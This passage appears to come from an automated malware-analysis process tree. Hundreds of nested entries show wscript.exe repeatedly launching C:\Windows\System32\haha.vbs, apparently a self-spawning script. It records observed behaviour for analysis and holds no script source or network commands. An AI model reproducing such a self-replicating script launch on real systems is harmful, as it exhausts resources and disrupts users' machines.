        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        518⤵
        
        PID:12668
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        519⤵
        
        PID:23260
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        520⤵
        
        PID:12708
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        521⤵
        
        PID:23396
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        522⤵
        
        PID:22584
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        523⤵
        
        PID:13256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        524⤵
        
        PID:4220
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        525⤵
        
        PID:13404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        526⤵
        
        PID:23612
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        527⤵
        
        PID:23668
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        528⤵
        
        PID:23724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        529⤵
        
        PID:23792
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        530⤵
        
        PID:23840
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        531⤵
        
        PID:23924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        532⤵
        
        PID:23992
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        533⤵
        
        PID:24080
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        534⤵
        
        PID:24136
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        535⤵
        
        PID:24196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        536⤵
        
        PID:24244
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        537⤵
        
        PID:24300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        538⤵
        
        PID:24356
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        539⤵
        
        PID:24428
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        540⤵
        
        PID:24484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        541⤵
        
        PID:24528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        542⤵
        
        PID:13716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        543⤵
        
        PID:23784
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        544⤵
        
        PID:23868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        545⤵
        
        PID:24052
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        546⤵
        
        PID:4896
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        547⤵
        
        PID:24520
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        548⤵
        
        PID:4996
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        549⤵
        
        PID:23880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        550⤵
        
        PID:4344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        551⤵
        
        PID:24072
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        552⤵
        
        PID:24284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        553⤵
        
        PID:15116
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        554⤵
        
        PID:13828
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        555⤵
        
        PID:24592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        556⤵
        
        PID:24640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        557⤵
        
        PID:24692
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        558⤵
        
        PID:24740
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        559⤵
        
        PID:24788
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        560⤵
        
        PID:24836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        561⤵
        
        PID:24884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        562⤵
        
        PID:24924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        563⤵
        
        PID:24980
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        564⤵
        
        PID:25024
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        565⤵
        
        PID:25068
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        566⤵
        
        PID:25116
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        567⤵
        
        PID:25168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        568⤵
        
        PID:25212
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        569⤵
        
        PID:25252
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        570⤵
        
        PID:25288
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        571⤵
        
        PID:25332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        572⤵
        
        PID:25376
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        573⤵
        
        PID:25432
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        574⤵
        
        PID:25488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        575⤵
        
        PID:25540
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        576⤵
        
        PID:25584
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        577⤵
        
        PID:4300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        578⤵
        
        PID:15080
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        579⤵
        
        PID:5132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        580⤵
        
        PID:5212
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        581⤵
        
        PID:15648
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        582⤵
        
        PID:25368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        583⤵
        
        PID:1712
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        584⤵
        
        PID:15460
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        585⤵
        
        PID:15756
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        586⤵
        
        PID:25604
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        587⤵
        
        PID:25664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        588⤵
        
        PID:25704
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        589⤵
        
        PID:25760
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        590⤵
        
        PID:25808
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        591⤵
        
        PID:25852
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        592⤵
        
        PID:25908
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        593⤵
        
        PID:25972
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        594⤵
        
        PID:26028
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        595⤵
        
        PID:26068
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        596⤵
        
        PID:26116
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        597⤵
        
        PID:26200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        598⤵
        
        PID:26256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        599⤵
        
        PID:26292
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        600⤵
        
        PID:26368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        601⤵
        
        PID:26420
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        602⤵
        
        PID:26480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        603⤵
        
        PID:26544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        604⤵
        
        PID:26596
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        605⤵
        
        PID:5580
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        606⤵
        
        PID:16752
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        607⤵
        
        PID:26244
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        608⤵
        
        PID:5860
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        609⤵
        
        PID:26152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        610⤵
        
        PID:26284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        611⤵
        
        PID:26712
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        612⤵
        
        PID:26772
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        613⤵
        
        PID:26848
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        614⤵
        
        PID:27064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        615⤵
        
        PID:27116
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        616⤵
        
        PID:27168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        617⤵
        
        PID:27340
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        618⤵
        
        PID:27452
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        619⤵
        
        PID:27556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        620⤵
        
        PID:27632
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        621⤵
        
        PID:26640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        622⤵
        
        PID:26916
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        623⤵
        
        PID:27192
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        624⤵
        
        PID:27320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        625⤵
        
        PID:17924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        626⤵
        
        PID:5716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        627⤵
        
        PID:26628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        628⤵
        
        PID:18240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        629⤵
        
        PID:5112
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        630⤵
        
        PID:2816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        631⤵
        
        PID:27276
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        632⤵
        
        PID:26988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        633⤵
        
        PID:18292
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        634⤵
        
        PID:27024
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        635⤵
        
        PID:26668
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        636⤵
        
        PID:27036
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        637⤵
        
        PID:552
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        638⤵
        
        PID:4932
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        639⤵
        
        PID:27144
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        640⤵
        
        PID:18252
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        641⤵
        
        PID:1488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        642⤵
        
        PID:18876
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        643⤵
        
        PID:3312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        644⤵
        
        PID:6276
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        645⤵
        
        PID:27776
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        646⤵
        
        PID:27828
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        647⤵
        
        PID:27876
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        648⤵
        
        PID:27928
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        649⤵
        
        PID:27972
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        650⤵
        
        PID:28016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        651⤵
        
        PID:28060
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        652⤵
        
        PID:28104
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        653⤵
        
        PID:28148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        654⤵
        
        PID:28192
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        655⤵
        
        PID:28240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        656⤵
        
        PID:28284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        657⤵
        
        PID:28332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        658⤵
        
        PID:28376
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        659⤵
        
        PID:28420
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        660⤵
        
        PID:28472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        661⤵
        
        PID:28520
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        662⤵
        
        PID:28572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        663⤵
        
        PID:28620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        664⤵
        
        PID:28664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        665⤵
        
        PID:3528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        666⤵
        
        PID:27868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        667⤵
        
        PID:6324
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        668⤵
        
        PID:20320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        669⤵
        
        PID:2480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        670⤵
        
        PID:8236
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        671⤵
        
        PID:6724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        672⤵
        
        PID:6880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        673⤵
        
        PID:5676
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        674⤵
        
        PID:21136
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        675⤵
        
        PID:3240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        676⤵
        
        PID:20616
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        677⤵
        
        PID:10368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        678⤵
        
        PID:6708
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        679⤵
        
        PID:28724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        680⤵
        
        PID:28776
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        681⤵
        
        PID:28848
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        682⤵
        
        PID:28912
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        683⤵
        
        PID:28972
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        684⤵
        
        PID:29032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        685⤵
        
        PID:29072
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        686⤵
        
        PID:29124
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        687⤵
        
        PID:29188
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        688⤵
        
        PID:29256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        689⤵
        
        PID:29312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        690⤵
        
        PID:29356
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        691⤵
        
        PID:29416
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        692⤵
        
        PID:29464
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        693⤵
        
        PID:29556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        694⤵
        
        PID:29620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        695⤵
        
        PID:29672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        696⤵
        
        PID:21848
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        697⤵
        
        PID:21988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        698⤵
        
        PID:7544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        699⤵
        
        PID:7808
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        700⤵
        
        PID:8044
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        701⤵
        
        PID:8180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        702⤵
        
        PID:22064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        703⤵
        
        PID:8488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        704⤵
        
        PID:21528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        705⤵
        
        PID:22728
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        706⤵
        
        PID:29612
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        707⤵
        
        PID:9176
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        708⤵
        
        PID:9284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        709⤵
        
        PID:9484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        710⤵
        
        PID:23512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        711⤵
        
        PID:9872
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        712⤵
        
        PID:10140
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        713⤵
        
        PID:11796
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        714⤵
        
        PID:9836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        715⤵
        
        PID:10428
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        716⤵
        
        PID:10644
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        717⤵
        
        PID:29304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        718⤵
        
        PID:10776
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        719⤵
        
        PID:22884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        720⤵
        
        PID:11232
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        721⤵
        
        PID:11028
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        722⤵
        
        PID:11424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
